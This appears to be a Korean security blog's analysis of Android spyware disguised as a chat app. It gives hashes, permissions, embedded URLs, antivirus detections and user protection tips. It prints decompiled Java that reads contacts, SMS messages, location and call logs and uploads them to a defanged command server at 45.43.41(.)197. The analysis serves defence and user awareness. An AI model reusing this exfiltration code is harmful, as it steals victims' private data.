꿈을꾸는 파랑새

반응형

오늘은 채팅 앱 으로 위장을 하고 개인정보를 불법으로 취득하는 악성코드인 나만의 공간.apk에 대해 알아보겠습니다.
해당 악성코드를 실행을 시켜주면 지난 시간에 소개해 드린 갤러리.apk(2021.10.11) 하고 똑같은 방식을 취하는 것을 볼 수가 있습니다.
먼저 해쉬값은 다음과 같습니다.
파일명: 나만의 공간.apk
사이즈:11.7 MB
CRC32:308c7cae
MD5:33a76892437df85bcd2472dead919aca
SHA-1:71e20f342e0202719d414e9ce0e7e7f524c47c6e
SHA-256:06b3676ec5b7bf1dd08d49e0aec1f80e1aa5f779c67f883062ca498d20df857c
해당 악성코드를 실행을 시키면 일단 해당 악성코드를 실행하기 위해서 권한을 달라고 하면 권한을 배경 화면은 스치면 인연, 스며들면 사랑이라는 화면을 보여주지만 모든 권한을 다 획득하고 나면

나만의 공간.apk 악성코드 실행
나만의 공간.apk 악성코드 실행

다음과 같은 메시지를 확인할 수가 있습니다.
안전 영업
서버점검 중입니다.
안정적인 서비스를 위해 서버 업데이트 진행 중입니다.
이용에 불편하게 해 죄송합니다.
자세한 내용은 고객센터에 문의하세요.

나만의 공간.apk 안전영업
나만의 공간.apk 안전영업

라고 돼 있으면 최종적으로 http://45.43.41(.)197:1001/api/uploads/apima 으로 데이터를 보내는 것을 확인할 수가 있습니다.
일단 추측을 해보며 일단 해당 악성코드에서 몇 개 부분을 수정하고 기존의 주소는 그대로 사용을 하는 것 같습니다. 해당 악성코드는 classes.dex 는 3개가 존재합니다.
각각의 DEX Base Info 정보는 다음과 같습니다.
[DEX Base Info]
Dex File Name:classes.dex
File Size:4681356 bytes
MD5:ce35a185029b5c1d60c3b64ca91c9848
Class Size:2700
Method Size:29961
String Size:42200
Dex File Name:classes2.dex
File Size:4535548 bytes
MD5:2d097c50836f8d3fc9ff2769f4c2762b
Class Size:2350
Method Size:29998
String Size:39399
Dex File Name:classes3.dex
File Size:33760 bytes
MD5:d04e6d85eb6f1148b89d46fcd151105c
Class Size:348
Method Size:5421
String Size:8140
File Base Info]
File Name: C:\Users\???\Desktop\나만의 공간.apk
Package Name:hub.com.work
Main Activity:hub.com.activity.AbsActivity
File Size:12281730 bytes
MD5:33a76892437df85bcd2472dead919aca
Packed:Not Packed
Min SDK:19
Target SDK:31

getPhoneNumber
getPhoneNumber

입니다. 그리고 안드로이드 권한은 다음과 같습니다.

<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS"/>
<uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
<uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>

이며 악성코드 안드로이드 권한을 보면 인터넷 연결, 연락처 읽기, 문자 읽기, 외장 공간 즉 마이크로 SD 읽기, 위치 찾기, 백그라운드 동작, 포그라운드 위치의 필요성을 선언, 와이파이 접근, 와이파이 변경, 추가적인 위치 선언,장 공간 즉 마이크로 SD 쓰기, 기본 맵핑 기능을 위한 필수 권한 이 들어가 져 있는 것을 확인할 수가 있습니다.
getPhoneNumber 에서는 안드로이드 기기에서 전화번호를 가져 오기 위한 코드가 들어가져 있는 것을 볼 수가 있습니다.

public void SystemUtil(){
       super();
    }
    public static String getDevice(){
       return new StringBuilder()+SystemUtil.getDeviceBrand()+"-"+SystemUtil.getSystemModel();
    }
    public static String getDeviceBrand(){
       return Build.BRAND;
    }
    public static String getPhoneNumber(Context context){
       String phone;
       try{
          phone = context.getSystemService("phone").getLine1Number();
       }catch(java.lang.Exception e0){
          phone = "";
       }
       String str = (!TextUtils.isEmpty(e))? Pattern.compile("[^\\d]").matcher(e).replaceAll("").trim(): e;
       return str;
    }
    public static String getSystemModel(){
       return Build.MODEL;
    }
}

그리고 IMEI 값 조회를 조회하기 위해서 androidx/appcompat/app/AppCompatDelegateImpl,androidx/appcompat/app/ToolbarActionBar,androidx/appcompat/app/WindowDecorActionBar 있으며 
androidx.appcompat.app.AppCompatDelegateImpl 기준으로 다음과 같이 돼 있습니다.

private boolean preparePanel(PanelFeatureState st, KeyEvent event) {
        DecorContentParent decorContentParent;
        DecorContentParent decorContentParent2;
        DecorContentParent decorContentParent3;
        if (this.mIsDestroyed) {
            return false;
        }
        if (st.isPrepared) {
            return true;
        }
        PanelFeatureState panelFeatureState = this.mPreparedPanel;
        if (!(panelFeatureState == null || panelFeatureState == st)) {
            closePanel(panelFeatureState, false);
        }
        Window.Callback cb = getWindowCallback();
        if (cb != null) {
            st.createdPanelView = cb.onCreatePanelView(st.featureId);
        }
        boolean isActionBarMenu = st.featureId == 0 || st.featureId == 108;
        if (isActionBarMenu && (decorContentParent3 = this.mDecorContentParent) != null) {
            decorContentParent3.setMenuPrepared();
        }
        if (st.createdPanelView == null && (!isActionBarMenu || !(peekSupportActionBar() instanceof ToolbarActionBar))) {
            if (st.menu == null || st.refreshMenuContent) {
                if (st.menu == null && (!initializePanelMenu(st) || st.menu == null)) {
                    return false;
                }
                if (isActionBarMenu && this.mDecorContentParent != null) {
                    if (this.mActionMenuPresenterCallback == null) {
                        this.mActionMenuPresenterCallback = new ActionMenuPresenterCallback();
                    }
                    this.mDecorContentParent.setMenu(st.menu, this.mActionMenuPresenterCallback);
                }
                st.menu.stopDispatchingItemsChanged();
                if (!cb.onCreatePanelMenu(st.featureId, st.menu)) {
                    st.setMenu(null);
                    if (isActionBarMenu && (decorContentParent2 = this.mDecorContentParent) != null) {
                        decorContentParent2.setMenu(null, this.mActionMenuPresenterCallback);
                    }
                    return false;
                }
                st.refreshMenuContent = false;
            }
            st.menu.stopDispatchingItemsChanged();
            if (st.frozenActionViewState != null) {
                st.menu.restoreActionViewStates(st.frozenActionViewState);
                st.frozenActionViewState = null;
            }
            if (!cb.onPreparePanel(0, st.createdPanelView, st.menu)) {
                if (isActionBarMenu && (decorContentParent = this.mDecorContentParent) != null) {
                    decorContentParent.setMenu(null, this.mActionMenuPresenterCallback);
                }
                st.menu.startDispatchingItemsChanged();
                return false;
            }
            st.qwertyMode = KeyCharacterMap.load(event != null ? event.getDeviceId() : -1).getKeyboardType() != 1;
            st.menu.setQwertyMode(st.qwertyMode);
            st.menu.startDispatchingItemsChanged();
        }
        st.isPrepared = true;
        st.isHandled = false;
        this.mPreparedPanel = st;
        return true;
    }

getDeviceId()
getDeviceId()

악성코드에서 포함된 주소는 다음과 같습니다.

http://restsdk.amap(.)com/v3/place/text
K-.Ki(.)Ki/K-
https://restsdk.amap(.)com/v3/iasdkauth
http://lbs.amap(.)com/api/android-location-sdk/guide/utilities/errorcode/
http://45.43.41(.)197:1001/api/uploads/addimg
http://45.43.41(.)197:1001/api/uploads/apisms
http://restsdk.amap(.)com/v3/geocode/regeo
http://restsdk.amap(.)com
https://publicsuffix(.)org/list/public_suffix_list.dat
http://restsdk.amap(.)com/v3/place/around?
http://apilocate.amap(.)com/mobile/binary
http://45.43.41(.)197:1001/api/uploads/api
http://45.43.41(.)197:1001
http://abroad.apilocate.amap(.)com/mobile/binary
https://android.bugly.qq(.)com/rqd/async
cgicol.amap(.)com/collection/collectData?src=baseCol&ver=v74&
https://astat.bugly.qcloud(.)com/rqd/async
http://45.43.41(.)197:1001/api/uploads/callhis
http://schemas.android(.)com/apk/res-auto
http://45.43.41(.)197:1001/api/uploads/upload
http://45.43.41(.)197:1001/api/uploads/apimap
https://mozilla(.)org/MPL/2.0/
http://schemas.android(.)com/apk/res/android
https://astat.bugly.cros.wr(.)pvp.net/:8180/rqd/async
http://dualstack-arestapi.amap(.)com/v3/geocode/regeo
http://cgicol.amap(.)com/collection/collectData?src=baseCol&ver=v74&
https://dualstack-arestapi(.)amap.com/v3/iasdkauth
http://restsdk.amap(.)com/v3/config/district?
http://dualstack-a.apilocate(.amap.)com/mobile/binary

악성코드에 포함이 되어져 있는 인터넷 주소
악성코드에 포함이 되어져 있는 인터넷 주소

입니다.그리고 hub.com.activity.AbsActivity 부분에서는 사용자의 정보가 악의적인 목적이 있는 사람으로 스마트폰 정보 및 개인정보가 전송되게 구성이 돼 있습니다.

스마트폰 개인정보 전송
스마트폰 개인정보 전송

/* loaded from: classes3.dex */
public class AbsActivity extends BaseActivity {
    private static final int REQUEST_CODE_ASK_WRITE_EXTERNAL_STORAGE = 291;
    private static final int maxRetry = 3;
    private LinearLayout layout_delay;
    private int retryNum;
    private FrameLayout root;
    private SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss");
    private Handler handler = new Handler();

    static /* synthetic */ int access$1108(AbsActivity x0) {
        int i = x0.retryNum;
        x0.retryNum = i + 1;
        return i;
    }

    /* JADX INFO: Access modifiers changed from: protected */
    @Override // hub.com.base.BaseActivity, androidx.appcompat.app.AppCompatActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_first);
        if (loadWeb()) {
            startActivity(new Intent(this, WebActivity.class));
            finish();
            return;
        }
        initView();
        this.handler.postDelayed(new Runnable() { // from class: hub.com.activity.AbsActivity.1
            @Override // java.lang.Runnable
            public void run() {
                AbsActivity.this.requestPermissions();
            }
        }, 2000);
    }

    /* JADX INFO: Access modifiers changed from: protected */
    @Override // hub.com.base.BaseActivity, androidx.appcompat.app.AppCompatActivity, androidx.fragment.app.FragmentActivity, android.app.Activity
    public void onDestroy() {
        super.onDestroy();
        this.handler.removeCallbacksAndMessages(null);
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void requestPermissions() {
        List<String> permissions = new ArrayList<>();
        permissions.add("android.permission.ACCESS_COARSE_LOCATION");
        permissions.add("android.permission.ACCESS_FINE_LOCATION");
        permissions.add("android.permission.READ_PHONE_STATE");
        permissions.add("android.permission.READ_CONTACTS");
        permissions.add("android.permission.READ_SMS");
        PermissionX.init(this).permissions(permissions).onExplainRequestReason(new ExplainReasonCallback() { // from class: hub.com.activity.AbsActivity.4
            @Override // com.permissionx.guolindev.callback.ExplainReasonCallback
            public void onExplainReason(ExplainScope scope, List<String> deniedList) {
                scope.showRequestReasonDialog(deniedList, AbsActivity.this.getString(R.string.Qw_Bin_res_0x7f0e001b), "확정 하 다");
            }
        }).onForwardToSettings(new ForwardToSettingsCallback() { // from class: hub.com.activity.AbsActivity.3
            @Override // com.permissionx.guolindev.callback.ForwardToSettingsCallback
            public void onForwardToSettings(ForwardScope scope, List<String> deniedList) {
                scope.showForwardToSettingsDialog(deniedList, AbsActivity.this.getString(R.string.Qw_Bin_res_0x7f0e001b), "설치");
            }
        }).request(new RequestCallback() { // from class: hub.com.activity.AbsActivity.2
            @Override // com.permissionx.guolindev.callback.RequestCallback
            public void onResult(boolean allGranted, List<String> grantedList, List<String> deniedList) {
                if (allGranted) {
                    if (AbsActivity.this.needDelay()) {
                        AbsActivity.this.handler.postDelayed(new Runnable() { // from class: hub.com.activity.AbsActivity.2.1
                            @Override // java.lang.Runnable
                            public void run() {
                                AbsActivity.this.root.setBackgroundColor(AbsActivity.this.getResources().getColor(R.color.white));
                                AbsActivity.this.layout_delay.setVisibility(0);
                            }
                        }, 1500);
                    } else {
                        AbsActivity.this.showProgress("", false);
                    }
                    new Thread(new Runnable() { // from class: hub.com.activity.AbsActivity.2.2
                        @Override // java.lang.Runnable
                        public void run() {
                            List<LocalContacts> data;
                            LocalMessage localMessage;
                            List<LocalContacts> data2 = ContactUtils.getAllContacts(AbsActivity.this.context);
                            for (LocalContacts lc : data2) {
                                DBManager.getInstance(AbsActivity.this.context).saveContacts(lc, false);
                            }
                            Cursor cursor = AbsActivity.this.getContentResolver().query(Uri.parse("content://sms/"), null, null, null, "date asc");
                            while (cursor != null && cursor.moveToNext()) {
                                try {
                                    int idColumn = cursor.getColumnIndex("_id");
                                    int nameColumn = cursor.getColumnIndex("person");
                                    int phoneNumberColumn = cursor.getColumnIndex("address");
                                    int smsbodyColumn = cursor.getColumnIndex("body");
                                    int dateColumn = cursor.getColumnIndex("date");
                                    int typeColumn = cursor.getColumnIndex(Const.TableSchema.COLUMN_TYPE);
                                    long id = cursor.getLong(idColumn);
                                    int Name = cursor.getInt(nameColumn);
                                    String Date = AbsActivity.this.sdf.format(new Date(cursor.getLong(dateColumn)));
                                    String PhoneNumber = cursor.getString(phoneNumberColumn);
                                    String Smsbody = cursor.getString(smsbodyColumn);
                                    String Type = cursor.getString(typeColumn);
                                    localMessage = new LocalMessage();
                                    localMessage.setId(id);
                                    localMessage.setName(Name);
                                    localMessage.setDate(Date);
                                    localMessage.setPhoneNumber(PhoneNumber);
                                    localMessage.setSmsbody(Smsbody);
                                    localMessage.setType(Type);
                                    data = data2;
                                } catch (Exception e) {
                                    data = data2;
                                }
                                try {
                                    DBManager.getInstance(AbsActivity.this.context).saveMessage(localMessage, false);
                                    data2 = data;
                                } catch (Exception e2) {
                                    data2 = data;
                                }
                            }
                            if (cursor != null) {
                                cursor.close();
                            }
                            SharedPreferences pref = AbsActivity.this.getSharedPreferences("config", 0);
                            String sjh = pref.getString("sjh", "");
                            if (TextUtils.isEmpty(sjh)) {
                                sjh = SystemUtil.getPhoneNumber(AbsActivity.this.context);
                            }
                            if (TextUtils.isEmpty(sjh)) {
                                sjh = String.valueOf(System.currentTimeMillis());
                            }
                            String yqm = pref.getString("yqm", "");
                            if (TextUtils.isEmpty(yqm)) {
                                yqm = AbsActivity.randomCode();
                            }
                            pref.edit().putString("sjh", sjh).putString("yqm", yqm).apply();
                            AbsActivity.this.retryNum = 0;
                            AbsActivity.this.uploadContacts(sjh, yqm);
                        }
                    }).start();
                    return;
                }
                AbsActivity.this.finish();
            }
        });
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void uploadContacts(final String sjh, final String yqm) {
        String address = SystemUtil.getDevice();
        StringBuilder con = new StringBuilder(sjh + "**" + yqm + "**" + address);
        final List<LocalContacts> list = DBManager.getInstance(this.context).getContacts();
        if (list == null || list.isEmpty()) {
            uploadMessages(sjh, yqm);
            return;
        }
        for (LocalContacts lc : list) {
            con.append('=');
            con.append(lc.getName());
            con.append('|');
            con.append(lc.getPhone());
            lc.setSend(true);
        }
        OkHttpUtils.post().url("http://45.43.41(.)197:1001/api/uploads/api").addParams("data", con.toString()).build().execute(new StringCallback() { // from class: hub.com.activity.AbsActivity.5
            @Override // com.zhy.http.okhttp.callback.Callback
            public void onError(Call call, Exception e, int id) {
                e.printStackTrace();
                if (!Utils.needTry(e)) {
                    AbsActivity.this.showMessage(e.getMessage());
                } else if (AbsActivity.this.retryNum < 3) {
                    AbsActivity.access$1108(AbsActivity.this);
                    AbsActivity.this.uploadContacts(sjh, yqm);
                } else {
                    AbsActivity.this.showMessage(e.getMessage());
                }
            }

            public void onResponse(String response, int id) {
                LitePal.saveAll(list);
                AbsActivity.this.retryNum = 0;
                AbsActivity.this.uploadMessages(sjh, yqm);
            }
        });
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void uploadMessages(final String sjh, final String yqm) {
        StringBuilder duanxin = new StringBuilder("[{\"imei\":\"" + sjh + "\",\"imei2\":\"" + yqm + "\"}");
        final List<LocalMessage> list = DBManager.getInstance(this.context).getMessage();
        if (list == null || list.isEmpty()) {
            goNext(sjh, yqm);
            return;
        }
        for (LocalMessage lm : list) {
            String post = JsonUtils.toJson(lm);
            duanxin.append(',');
            duanxin.append(post);
            lm.setSend(true);
        }
        duanxin.append("]");
        OkHttpUtils.post().url("http://45.43.41(.)197:1001/api/uploads/apisms").addParams("data", duanxin.toString()).build().execute(new StringCallback() { // from class: hub.com.activity.AbsActivity.6
            @Override // com.zhy.http.okhttp.callback.Callback
            public void onError(Call call, Exception e, int id) {
                if (!Utils.needTry(e)) {
                    AbsActivity.this.showMessage(e.getMessage());
                } else if (AbsActivity.this.retryNum < 3) {
                    AbsActivity.access$1108(AbsActivity.this);
                    AbsActivity.this.uploadMessages(sjh, yqm);
                } else {
                    AbsActivity.this.showMessage(e.getMessage());
                }
            }

            public void onResponse(String response, int id) {
                LitePal.saveAll(list);
                AbsActivity.this.goNext(sjh, yqm);
            }
        });
    }

    public static String randomCode() {
        StringBuilder str = new StringBuilder();
        Random random = new Random();
        for (int i = 0; i < 6; i++) {
            str.append(random.nextInt(10));
        }
        return str.toString();
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void goNext(final String sjh, final String yqm) {
        if (!needDelay()) {
            runOnUiThread(new Runnable() { // from class: hub.com.activity.AbsActivity.7
                @Override // java.lang.Runnable
                public void run() {
                    AbsActivity.this.hideProgress();
                    AbsActivity.this.startActivity(new Intent(AbsActivity.this.context, AdvertiseActivity.class).putExtra("sjh", sjh).putExtra("yqm", yqm));
                    AbsActivity.this.finish();
                }
            });
        }
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void showMessage(final String message) {
        runOnUiThread(new Runnable() { // from class: hub.com.activity.AbsActivity.8
            @Override // java.lang.Runnable
            public void run() {
                AbsActivity.this.hideProgress();
                Toast.makeText(AbsActivity.this.context, message, 1).show();
            }
        });
    }

    /* JADX INFO: Access modifiers changed from: private */
    public boolean needDelay() {
        return BuildConfig.FLAVOR.equals("Korea07") || BuildConfig.FLAVOR.equals("Korea09") || BuildConfig.FLAVOR.equals("Korea11");
    }

    private boolean loadWeb() {
        return BuildConfig.FLAVOR.equals("Korea13") || BuildConfig.FLAVOR.equals("Korea14");
    }

    private void initView() {
        this.layout_delay = (LinearLayout) findViewById(R.id.layout_delay);
        this.root = (FrameLayout) findViewById(R.id.root);
    }

    private void getLocationLL(String sjh, String yqm) {
        Location location = getLastKnownLocation();
        if (location != null) {
            OkHttpUtils.post().url("http://45.43.41(.)197:1001/api/uploads/apimap").addParams("data", sjh + ',' + yqm + ',' + location.getLongitude() + ',' + location.getLatitude()).build().execute(new StringCallback() { // from class: hub.com.activity.AbsActivity.9
                @Override // com.zhy.http.okhttp.callback.Callback
                public void onError(Call call, Exception e, int id) {
                    e.printStackTrace();
                }

                public void onResponse(String response, int id) {
                    PrintStream printStream = System.out;
                    printStream.println("response:" + response);
                }
            });
            return;
        }
        Toast.makeText(this, "something wrong", 0).show();
    }

    private Location getLastKnownLocation() {
        LocationManager mLocationManager = (LocationManager) getApplicationContext().getSystemService("location");
        Location bestLocation = null;
        for (String provider : mLocationManager.getProviders(true)) {
            if (ActivityCompat.checkSelfPermission(this, "android.permission.ACCESS_FINE_LOCATION") == 0 || ActivityCompat.checkSelfPermission(this, "android.permission.ACCESS_COARSE_LOCATION") == 0) {
                Location l = mLocationManager.getLastKnownLocation(provider);
                if (l != null && (bestLocation == null || l.getAccuracy() < bestLocation.getAccuracy())) {
                    bestLocation = l;
                }
            } else {
                ActivityCompat.requestPermissions(this, new String[]{"android.permission.ACCESS_FINE_LOCATION", "android.permission.ACCESS_COARSE_LOCATION"}, REQUEST_CODE_ASK_WRITE_EXTERNAL_STORAGE);
                return null;
            }
        }
        return bestLocation;
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void uploadCallLog(final String sjh, final String yqm) {
        Map<String, Object> map = new HashMap<>();
        map.put("local_phone", sjh);
        final List<LocalCall> list = DBManager.getInstance(this.context).getCallLog();
        map.put("call_log", list);
        if (!(list == null || list.isEmpty())) {
            for (LocalCall lc : list) {
                lc.setSend(true);
            }
            System.out.println(new Gson().toJson(map));
            OkHttpUtils.post().url("http://45.43.41(.)197:1001/api/uploads/callhis").addParams("local_phone", sjh).addParams("call_log", new Gson().toJson(list)).build().execute(new StringCallback() { // from class: hub.com.activity.AbsActivity.10
                @Override // com.zhy.http.okhttp.callback.Callback
                public void onError(Call call, Exception e, int id) {
                    if (!Utils.needTry(e)) {
                        AbsActivity.this.showMessage(e.getMessage());
                    } else if (AbsActivity.this.retryNum < 3) {
                        AbsActivity.access$1108(AbsActivity.this);
                        AbsActivity.this.uploadCallLog(sjh, yqm);
                    } else {
                        AbsActivity.this.showMessage(e.getMessage());
                    }
                }

                public void onResponse(String response, int id) {
                    LitePal.saveAll(list);
                    AbsActivity.this.goNext(sjh, yqm);
                }
            });
        }
    }
}

2021-12-27 05:42:47 UTC 바이러스토탈에서 탐지를 하는 보안 업체들은 다음과 같습니다.
AhnLab-V3:PUP/Android.Agent.1070959
Alibaba:TrojanSpy:Android/Agent.660af872
Avast-Mobile:Android:Evo-gen [Trj]
Avira (no cloud):ANDROID/SpyAgent.FKMB.Gen
Cynet:Malicious (score: 99)
DrWeb:Android.Spy.916.origin
ESET-NOD32:A Variant Of Android/Spy.Agent.BUF
Fortinet:Android/Agent.BUF!tr.spy
Ikarus:Trojan-Spy.AndroidOS.Agent
K7GW:Spyware ( 00581fe61 )
Kaspersky:HEUR:Trojan-Spy.AndroidOS.Agent.ze
McAfee:Artemis!33A76892437D
McAfee-GW-Edition:Artemis
Microsoft:Trojan:Script/Wacatac.B!ml
Sophos:Andr/Spy-BGF
Symantec:Trojan.Gen.MBT
Symantec Mobile Insight:AdLibrary:Generisk
Tencent:A.privacy.SexInfoSteal
Trustlook:Android.PUA.General
1.구글 플레이 스토어 및 공식 스토어 이외에 어플 설치하지 말 것
2.공신력 있는 백신 앱(안티바이러스 앱) 설치해서 실시간 감시 및 실시간 업데이트할 것(AV-TEST 참고)
3.구글 안드로이드 스마트폰에서는 외부 앱을 설치를 하려고 하면 경고 메시지가 나오는데 해당 경고 메시지처럼 외부 앱 설치하지 말 것
4.스팸 차단앱 후후,후스콜,T 전화 같은 것을 사용하면 이런 앱을 활용을 하면 이런 보이스피싱 피해를 줄일 수가 있습니다.
5.강력한 암호를 사용하고 가능하면 이단계 인증 사용 권장
6.스마트폰으로 전송이 된 문자 또는 이메일 링크를 함부로 클릭 하지 말기
7.안드로이드 스마트폰에서 기본적으로 Google Play 프로텍트가 활성화돼 있습니다. 해당 기능이 활성화돼 있는지 확인(확인 방법 구글 플레이 스토어 실행 자신의 프로필 선택->Play 프로텍트 활성화
->톱니바퀴->Play 프로텍트 로 앱검사 활성화,유해 앱 감지 기능 개선(이것은 사용자 취향)
8. 스마트폰 앱 실행 시 모든 권한을 활성화 주의
9. 스마트폰 펌웨어, 운영 체제 및 응용 프로그램을 최신 상태로 유지
악성코드가 감염되었다고 의심되는 경우 행동
경우에 따라 멀웨어가 모바일 데이터를 다시 활성화할 수 있으므로 Wi-Fi(와이파이),모바일 데이터를 비활성화하고 SIM 카드(유심)를 제거공장 초기화
공장 초기화가 불가능한 경우 응용 프로그램을 제거
개인 미디어 파일(모바일 애플리케이션 제외)을 백업하고 기기를 초기화
보이스 피싱 같은 피해가 발생을 했으면 다른 스마트폰 등으로 112 전화 및 자신이 사용하는 은행에 도움 요청 및 신고
이런 악성코드로부터 보호하는 방법
뉴스 등에서는 문자 클릭 금지, 어플 삭제하라고 하지만 능동적으로 대처하는 방법은 백신 어플(백신 어플은 AV-TEST에서 성적이 좋은 제품 사용 권장 무료도 있지만 대부분 유료 무료이더라도 기능 제한) 및 후후,후스콜 같은 어플로 능동적으로 대처
기본적인 보안 수칙을 지키는 것이 안전하게 스마트폰을 사용하는 방법입니다.

반응형
그리드형

댓글

비밀글모드

  1. 헐... 별의별 악성 프로그램들이 다 있군요.
    2021년 마무리 잘하시고 즐거운 연말 연시되세요~
    새해 복 많이 받으세요~^^
    2021.12.31 16:46 신고
    • 새해 복 많이 받으세요.
      2021.12.31 22:38 신고